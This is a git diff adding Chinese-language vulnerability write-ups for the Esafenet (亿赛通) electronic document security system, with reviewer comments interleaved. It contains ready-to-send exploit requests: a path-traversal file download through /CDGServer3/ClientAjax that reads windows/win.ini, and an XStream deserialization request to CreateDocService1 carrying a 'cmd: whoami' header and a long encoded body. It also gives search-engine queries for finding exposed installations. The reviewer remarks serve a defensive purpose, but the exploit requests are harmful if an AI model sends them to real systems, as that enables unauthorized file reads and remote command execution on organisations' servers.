JIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMI
DAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNH
JFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHN
FFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJ
FEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706604760110-7ce8a195-a50b-4f62-b39d-911451a3a9a7.png](./img/af7dsU7CiKjv9PIM/1706604760110-7ce8a195-a50b-4f62-b39d-911451a3a9a7-211727.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hwfcqb1i5g4tcpfi> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统ClientAjax任意文件下载.md b/亿赛通电子文档安全管理系统ClientAjax任意文件下载.md new file mode 100644 index 0000000..a49d0db --- /dev/null 
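Review bot: section 二 "影响版本" lists only the product name, so a reader cannot tell which builds are affected or whether a fixed release exists; state the affected version range (or say it is unknown) and add a 修复建议 section, because the request in section 四 (a `Content-Type: text/xml` POST to `/CDGServer3/CDGAuthoriseTempletService1` carrying a `cmd: whoami` header) is exactly the shape a WAF or access-log rule should key on, and the document gives defenders nothing to act on. Smaller points: the request hard-codes `Host: 192.168.110.187:8090`, a lab address, where the ClientAjax file in this same patch leaves `Host:` as a placeholder; the 14 KB letter-only body is unexplained (what it encodes, how it was produced); the summary paragraph starts with a stray leading space, "IOS" should be "iOS", and its last sentence merely repeats the title; the file lacks a trailing newline.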
+++ b/亿赛通电子文档安全管理系统ClientAjax任意文件下载.md @@ -0,0 +1,33 @@ +# 亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载 + +# 一、漏洞简介 +亿赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/mbkO_M4VWp-8yvxF/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-404683.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/ClientAjax HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-type: application/x-www-form-urlencoded +Content-Length: 102 +Connection: close + +command=downclientpak&InstallationPack=../../../../../../../../../../windows/win.ini&forward=index.jsp +``` + +![1709050220404-e9b727a0-dcd7-43ee-a59e-600d2c799756.png](./img/mbkO_M4VWp-8yvxF/1709050220404-e9b727a0-dcd7-43ee-a59e-600d2c799756-467598.png) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bp3z1gini1gk9gf8> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统CreateDocService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统CreateDocService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..37cfa6d --- /dev/null +++ b/亿赛通电子文档安全管理系统CreateDocService1存在xstream反序列化漏洞.md 
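Review bot: the request in section 四 shows `command=downclientpak` returning `InstallationPack=../../../../../../../../../../windows/win.ini`, but the document stops at the screenshot; add a 修复建议 section stating the fix a defender needs (the parameter must resolve to a file name inside the package directory, with `..` segments and absolute paths rejected) and note that `../` in that parameter, or any `downclientpak` request resolving outside the package directory, is the detection signal. Section 二 again lists only the product name with no version range. Text points in section 一: "普通门" reads like a dropped character ("普通部门"), and the closing sentence only restates the title. `Content-Length: 102` does match the body, so that line is fine; `Host:` is left blank and would be clearer with an explicit placeholder value. The file lacks a trailing newline.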
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统CreateDocService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统CreateDocService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/hzfoaEiaCAHdMefm/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-881104.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/CreateDocService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDG
LNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLM
FFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAH